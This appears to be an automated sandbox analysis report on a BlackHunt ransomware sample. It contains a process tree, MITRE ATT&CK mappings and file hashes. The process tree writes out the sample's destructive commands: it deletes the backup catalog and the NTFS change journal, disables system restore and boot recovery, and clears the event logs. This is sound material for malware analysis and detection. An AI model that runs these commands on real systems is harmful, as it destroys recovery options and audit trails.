C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:13088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8564
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:13048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:12584
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:12544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:12408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:8636
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:9476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:10924
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:10824
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵PID:1684
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5980
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8084
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:11580
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:11400
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12464
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13356
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:7448
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:13020
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:13032
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:14660
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7976 -ip 79761⤵PID:7948
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5318979dd9409cce125db53e475a87040
SHA12338d56da25e95d33c0c0ac2750ce4f8eb89fa43
SHA25689959d57bd59a73082b7cebeb3a0738b1cc3879666fd768cca61aced8f1b061a
SHA51274dd73234de35a589f546d7c717bee84689792dfcf92db7918e28724bb92e86b3214d1bb1d0277928b788bdf816edd24ded87ad80b3ecd238955fa377cca4b6d
-
Filesize
12KB
MD507ba315667d7c8f22cea78627d136349
SHA1c8de7a322d582e64902e8777f99b4aa28ed34d92
SHA25601a892f4f0140787cbdef0fc5366800a6968fa2b9fe3c768eb37539ce427b085
SHA5121ff456b9e432e2d067601c258b5e26cde6806c317a0e4e5a53795e374cc33dd8b2a6336f65c76720d72ab0e18f0c6d1c50a3bcbbb96b9abfcb053f9ecba35c1c
-
Filesize
684B
MD5b8cad4d90f59759e8aa4fb3124884d6f
SHA1101e27af4764da775bc2d0b2c76a16494677109a
SHA2569e0511f76b84c1addc76326070c08ddafd98b5f49410943a486770a244451f37
SHA51248ee12c6d2c7b96a4e116ba130ad17582e72dd2b46a9dd74f751cd19ea6b245ab169f0c027633eb525758b90190d5bd6ebdd14a792e21dfffcda905af63d1eaa